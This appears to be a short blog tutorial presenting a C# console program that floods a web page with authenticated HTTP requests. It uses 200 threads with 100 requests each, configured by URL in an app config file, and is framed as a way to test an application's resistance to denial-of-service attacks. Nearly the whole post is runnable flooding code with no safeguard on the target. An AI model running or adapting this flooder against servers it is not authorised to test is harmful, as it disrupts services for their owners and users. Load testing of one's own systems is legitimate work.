Simulating the “Denial Of Service” Attack

.Net framework gives us out of the box namespace/classes, which can be used to simulate the “Denial Of Service” Attach with few lines of code. Like System.Threading, System.Net etc.

The simulation example can be used to check the web application resistance power against DoS Attack.
Below is the code snippet in C#.

using System;
using System.Collections;
using System.Configuration;
using System.Threading;

namespace Attacks
{
class Program
{
private static string url = string.Empty;
private static string user = string.Empty;
private static string password = string.Empty;
private static string domain = string.Empty;
private static Int64 threads = 0;
private static Int64 times = 0;

static void Main(string[] args)
{
url = ConfigurationSettings.AppSettings.Get("url");
user = ConfigurationSettings.AppSettings.Get("user");
password = ConfigurationSettings.AppSettings.Get("password");
domain = ConfigurationSettings.AppSettings.Get("domain");
threads = Convert.ToInt64(ConfigurationSettings.AppSettings.Get("threads"));
times = Convert.ToInt64(ConfigurationSettings.AppSettings.Get("times"));

RunDenialOfService();

Console.WriteLine("press any key to continue...");
Console.ReadKey();
}

private static void DoSomething()
{
DenialOfService dos = new DenialOfService(url, user, password, domain, times);
dos.StartProcess();
}

private static void RunDenialOfService()
{
ArrayList threadsList = new ArrayList();
for (int i = 0; i < threads; i++)
{
Thread t = new Thread(new ThreadStart(DoSomething));
t.Start();
threadsList.Add(t);

Console.WriteLine("total threads started: {0}", i);
}

foreach (Thread t in threadsList) t.Join();

Console.WriteLine("All Process are complete.");

}
}
}

using System;
using System.Net;
using System.Threading;

namespace Attacks
{
class DenialOfService
{
private string _url = string.Empty;
private string _user = string.Empty;
private string _password = string.Empty;
private string _domain = string.Empty;
private Int64 _times = 0;

public DenialOfService(string url, Int64 times)
{
_url = url;
_times = times;
}
public DenialOfService(string url, string user, string password, string domain, Int64 times)
{
_url = url;
_user = user;
_password = password;
_domain = domain;
_times = times;
}

public void StartProcess()
{
StartAttack();
}

private void StartAttack()
{
for (Int32 index = 0; index < _times; index++)
Operation(_url, _user, _password, _domain, index);

}

private void Operation(string url, string uid, string pwd, string domain, Int64 times)
{
Int32 threadName = 0;
try
{
threadName = Thread.CurrentThread.ManagedThreadId;

WebClient client = new WebClient();
client.Credentials = new NetworkCredential(uid, pwd, domain);
client.DownloadString(url);

Console.WriteLine("current thread id is: {0} and counter # is: {1}", threadName, times);
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
}
}
}

?xml version="1.0" encoding="utf-8" ?
configuration
appSettings
add key="url" value="http://myServer/Home.aspx" /
add key="user" value="u1" /
add key="password" value="p1" /
add key="domain" value="d1" /
add key="threads" value="200" /
add key="times" value="100" /
/appSettings
/configuration